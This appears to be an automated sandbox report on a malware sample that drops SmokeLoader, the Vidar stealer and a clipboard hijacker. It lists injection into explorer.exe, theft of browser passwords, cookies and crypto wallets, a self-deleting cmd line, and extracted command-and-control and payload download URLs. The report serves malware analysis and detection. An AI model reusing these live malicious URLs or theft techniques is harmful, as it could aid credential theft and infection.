Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_04C30083 push dword ptr fs:[00000030h]	22_2_04C30083
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_0040E0E2 mov eax, dword ptr fs:[00000030h]	23_2_0040E0E2
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_004106D5 mov eax, dword ptr fs:[00000030h]	23_2_004106D5
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_04CF0083 push dword ptr fs:[00000030h]	23_2_04CF0083
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 26_2_0040E0E2 mov eax, dword ptr fs:[00000030h]	26_2_0040E0E2
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 26_2_004106D5 mov eax, dword ptr fs:[00000030h]	26_2_004106D5
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 26_2_04D90083 push dword ptr fs:[00000030h]	26_2_04D90083

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe

Code function: 0_2_0040C066 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0040C066

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Local\Temp\45C4.exe

Code function: 19_2_0041178C GetProcessHeap,

19_2_0041178C

Enables debug privileges

Source: C:\Windows\SysWOW64\taskkill.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_0040C066 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040C066
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_0040C066 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_0040C066
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_0040A1A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_0040A1A9
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_0040A33C SetUnhandledExceptionFilter,	19_2_0040A33C
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_0040D33E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_0040D33E
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_0040A638 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_0040A638
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0040A1A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_0040A1A9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0040A33C SetUnhandledExceptionFilter,	22_2_0040A33C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0040D33E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_0040D33E
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0040A638 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	22_2_0040A638
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_0040A1A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_0040A1A9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_0040A33C SetUnhandledExceptionFilter,	23_2_0040A33C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_0040D33E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_0040D33E
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_0040A638 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	23_2_0040A638
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 26_2_0040A1A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_0040A1A9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 26_2_0040A33C SetUnhandledExceptionFilter,	26_2_0040A33C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 26_2_0040D33E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_0040D33E
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 26_2_0040A638 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	26_2_0040A638

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: bitbucket.org
Source: C:\Windows\explorer.exe	Domain query: bbuseruploads.s3.amazonaws.com
Source: C:\Windows\explorer.exe	Domain query: wedoepicsht.com
Source: C:\Windows\explorer.exe	Domain query: brandyjaggers.com

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: 45C4.exe.3.dr

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jajvesg	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jajvesg	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Thread created: C:\Windows\explorer.exe EIP: 30F1A18			Jump to behavior
Source: C:\Users\user\AppData\Roaming\jajvesg	Thread created: unknown EIP: 4EC1A18			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Process created: C:\ProgramData\CP8Z9ZN3KMVU03RJ.exe 'C:\ProgramData\CP8Z9ZN3KMVU03RJ.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /im A8D4.exe /f & timeout /t 6 & del /f /q 'C:\Users\user~1\AppData\Local\Temp\A8D4.exe' & del C:\ProgramData\*.dll & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im A8D4.exe /f	Jump to behavior

Uses taskkill to terminate processes

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im A8D4.exe /f

Source: explorer.exe, 00000003.00000000.262748208.0000000001400000.00000002.00020000.sdmp, SmartClock.exe, 00000016.00000002.514703080.0000000003790000.00000002.00020000.sdmp	Binary or memory string: uProgram Manager
Source: explorer.exe, 00000003.00000000.283010257.0000000005F40000.00000004.00000001.sdmp, SmartClock.exe, 00000016.00000002.514703080.0000000003790000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.262748208.0000000001400000.00000002.00020000.sdmp, SmartClock.exe, 00000016.00000002.514703080.0000000003790000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.262748208.0000000001400000.00000002.00020000.sdmp, SmartClock.exe, 00000016.00000002.514703080.0000000003790000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000000.293417561.0000000000EB8000.00000004.00000020.sdmp	Binary or memory string: ProgmanX
Source: explorer.exe, 00000003.00000000.285879491.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndAj

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Queries volume information: C:\ProgramData\JD01X9KLRK1KN5GDZZMAKOP40\files\Autofill\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Queries volume information: C:\ProgramData\JD01X9KLRK1KN5GDZZMAKOP40\files\CC\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Queries volume information: C:\ProgramData\JD01X9KLRK1KN5GDZZMAKOP40\files\Cookies\Edge_Cookies.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Queries volume information: C:\ProgramData\JD01X9KLRK1KN5GDZZMAKOP40\files\Cookies\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Queries volume information: C:\ProgramData\JD01X9KLRK1KN5GDZZMAKOP40\files\Cookies\IE_Cookies.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Queries volume information: C:\ProgramData\JD01X9KLRK1KN5GDZZMAKOP40\files\Downloads\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Queries volume information: C:\ProgramData\JD01X9KLRK1KN5GDZZMAKOP40\files\Files\ .zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Queries volume information: C:\ProgramData\JD01X9KLRK1KN5GDZZMAKOP40\files\History\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Queries volume information: C:\ProgramData\JD01X9KLRK1KN5GDZZMAKOP40\files\information.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Queries volume information: C:\ProgramData\JD01X9KLRK1KN5GDZZMAKOP40\files\passwords.txt VolumeInformation	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\45C4.exe

Code function: 19_2_0040A45B cpuid

19_2_0040A45B

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\AppData\Local\Temp\45C4.exe

Code function: 19_2_0040A092 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

19_2_0040A092

Stealing of Sensitive Information:

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected SmokeLoader

Source: Yara match	File source: 0.2.AhB0i1fe7I.exe.3040e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.AhB0i1fe7I.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.AhB0i1fe7I.exe.3050000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.jajvesg.30a0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.jajvesg.30b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.jajvesg.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.370320300.00000000030B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.250161255.0000000003050000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.370514515.0000000004CC1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.312248919.0000000003050000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.357701243.00000000030B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.313765796.0000000004C91000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.294319854.00000000030F1000.00000020.00020000.sdmp, type: MEMORY

Yara detected Clipboard Hijacker

Source: Yara match	File source: 23.3.SmartClock.exe.4e10000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.SmartClock.exe.4ce0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.SmartClock.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.SmartClock.exe.4d70e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.SmartClock.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.SmartClock.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.SmartClock.exe.4ce0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.SmartClock.exe.4d70e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.45C4.exe.4d60e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.SmartClock.exe.4e10e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.3.45C4.exe.4e00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.SmartClock.exe.4e10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.3.SmartClock.exe.4eb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.45C4.exe.4d60e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.SmartClock.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.SmartClock.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.SmartClock.exe.4e10e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.SmartClock.exe.4d80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.SmartClock.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.45C4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.SmartClock.exe.4d80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.45C4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.3.SmartClock.exe.4eb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.3.45C4.exe.4e00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.515686713.0000000004CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.412111998.0000000004D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.510378744.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.425312376.0000000004D80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.433662225.0000000004E10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.446910889.0000000004EB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.434242553.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.447461209.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.403493442.0000000004E00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.435078183.0000000004D70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.410422719.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.448260177.0000000004E10000.00000040.00000001.sdmp, type: MEMORY

Yara detected Vidar stealer

Source: Yara match	File source: 27.2.A8D4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.A8D4.exe.6760000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.A8D4.exe.6760000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.506315129.0000000006760000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.505442403.0000000000401000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: A8D4.exe PID: 6432, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: A8D4.exe, 0000001B.00000002.508143079.000000000BCBD000.00000004.00000001.sdmp	String found in binary or memory: \Wallets\Electrum
Source: A8D4.exe, 0000001B.00000002.508143079.000000000BCBD000.00000004.00000001.sdmp	String found in binary or memory: \Wallets\ElectronCash
Source: A8D4.exe, 0000001B.00000002.508143079.000000000BCBD000.00000004.00000001.sdmp	String found in binary or memory: Jaxx_New
Source: A8D4.exe, 0000001B.00000002.508143079.000000000BCBD000.00000004.00000001.sdmp	String found in binary or memory: \Wallets\ElectrumLTC
Source: A8D4.exe, 0000001B.00000002.507764805.000000000B0C0000.00000004.00000040.sdmp	String found in binary or memory: \Wallets\Exodus
Source: A8D4.exe, 0000001B.00000002.508143079.000000000BCBD000.00000004.00000001.sdmp	String found in binary or memory: Ethereum"
Source: A8D4.exe, 0000001B.00000002.508143079.000000000BCBD000.00000004.00000001.sdmp	String found in binary or memory: \Wallets\MultiDoge

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\??	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\??	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\????????	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\????????	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\????????	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\????????	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\??	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\??	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\????????	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\????????	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 27.2.A8D4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.A8D4.exe.6760000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.A8D4.exe.6760000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.506315129.0000000006760000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.505442403.0000000000401000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.506048650.0000000004B7A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: A8D4.exe PID: 6432, type: MEMORYSTR

Remote Access Functionality:

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected SmokeLoader

Source: Yara match	File source: 0.2.AhB0i1fe7I.exe.3040e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.AhB0i1fe7I.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.AhB0i1fe7I.exe.3050000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.jajvesg.30a0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.jajvesg.30b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.jajvesg.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.370320300.00000000030B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.250161255.0000000003050000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.370514515.0000000004CC1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.312248919.0000000003050000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.357701243.00000000030B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.313765796.0000000004C91000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.294319854.00000000030F1000.00000020.00020000.sdmp, type: MEMORY

Yara detected Vidar stealer

Source: Yara match	File source: 27.2.A8D4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.A8D4.exe.6760000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.A8D4.exe.6760000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.506315129.0000000006760000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.505442403.0000000000401000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: A8D4.exe PID: 6432, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_004098C0 AddClipboardFormatListener,SetEvent,	19_2_004098C0
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_00409436 IsWindow,RemoveClipboardFormatListener,IsWindow,	19_2_00409436
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_004095A8 RemoveClipboardFormatListener,	19_2_004095A8
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_004097BA AddClipboardFormatListener,	19_2_004097BA
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_004098C0 AddClipboardFormatListener,SetEvent,	22_2_004098C0
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_00409436 IsWindow,RemoveClipboardFormatListener,IsWindow,	22_2_00409436
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_004095A8 RemoveClipboardFormatListener,	22_2_004095A8
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_004097BA AddClipboardFormatListener,	22_2_004097BA
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_004098C0 AddClipboardFormatListener,SetEvent,	23_2_004098C0
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_00409436 IsWindow,RemoveClipboardFormatListener,IsWindow,	23_2_00409436
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_004095A8 RemoveClipboardFormatListener,	23_2_004095A8
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_004097BA AddClipboardFormatListener,	23_2_004097BA
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 26_2_004098C0 AddClipboardFormatListener,SetEvent,	26_2_004098C0
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 26_2_00409436 IsWindow,RemoveClipboardFormatListener,IsWindow,	26_2_00409436
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 26_2_004095A8 RemoveClipboardFormatListener,	26_2_004095A8
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 26_2_004097BA AddClipboardFormatListener,	26_2_004097BA

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
37.34.248.24	unknown	Kuwait	42961	GPRS-ASZAINKW	false
88.99.75.82	mas.to	Germany	24940	HETZNER-ASDE	false
54.231.129.81	s3-w.us-east-1.amazonaws.com	United States	16509	AMAZON-02US	false
8.209.64.52	wedoepicsht.com	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	false
65.108.80.190	unknown	United States	11022	ALABANZA-BALTUS	false
211.59.14.90	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	false
118.33.109.122	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
211.40.39.251	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	false
113.11.118.155	brandyjaggers.com	Bangladesh	7565	BDCOM-BDRangsNiluSquare5thFloorHouse75Road5AD	false
104.192.141.1	bitbucket.org	United States	16509	AMAZON-02US	false
52.217.90.100	unknown	United States	16509	AMAZON-02US	false

Private

IP
192.168.2.1

Contacted Domains

Name	IP	Active
s3-w.us-east-1.amazonaws.com	54.231.129.81	true
brandyjaggers.com	113.11.118.155	true
bitbucket.org	104.192.141.1	true
mas.to	88.99.75.82	true
wedoepicsht.com	8.209.64.52	true
bbuseruploads.s3.amazonaws.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://bitbucket.org/abobaajshdasdjk/zalupaaaaaaa/downloads/Taxao.exe	false		high
http://65.108.80.190/936	false	Avira URL Cloud: safe	unknown
http://bitbucket.org/abobaajshdasdjk/zalupaaaaaaa/downloads/Taxao.exe	false		high
http://szpnc.cn/upload/	true	Avira URL Cloud: safe	unknown
http://uggeboots.com/upload/	true	Avira URL Cloud: safe	unknown
http://brandyjaggers.com/upload/	true	Avira URL Cloud: safe	unknown
http://wedoepicsht.com/index.php	true	Avira URL Cloud: malware	unknown
http://andbal.com/upload/	true	Avira URL Cloud: safe	unknown
http://65.108.80.190/mozglue.dll	false	URL Reputation: safe	unknown
http://65.108.80.190/freebl3.dll	false	URL Reputation: safe	unknown
http://100klv.com/upload/	true	Avira URL Cloud: safe	unknown
https://bitbucket.org/abobaajshdasdjk/zalupaaaaaaa/downloads/build17.exe	false		high
http://65.108.80.190/nss3.dll	false	URL Reputation: safe	unknown
http://65.108.80.190/softokn3.dll	false	URL Reputation: safe	unknown
http://alotofquotes.com/upload/	true	Avira URL Cloud: safe	unknown
http://rapmusic.at/upload/	true	Avira URL Cloud: safe	unknown
http://65.108.80.190/	false	URL Reputation: safe	unknown
http://65.108.80.190/vcruntime140.dll	false	URL Reputation: safe	unknown
https://mas.to/@lilocc	false	Avira URL Cloud: safe	unknown
http://65.108.80.190/msvcp140.dll	false	URL Reputation: safe	unknown

AV Detection:

Antivirus detection for URL or domain

Source: http://wedoepicsht.com/index.php

Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000E.00000002.370320300.00000000030B0000.00000004.00000001.sdmp	Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://rapmusic.at/upload/", "http://100klv.com/upload/", "http://brandyjaggers.com/upload/", "http://andbal.com/upload/", "http://alotofquotes.com/upload/", "http://szpnc.cn/upload/", "http://uggeboots.com/upload/"]}
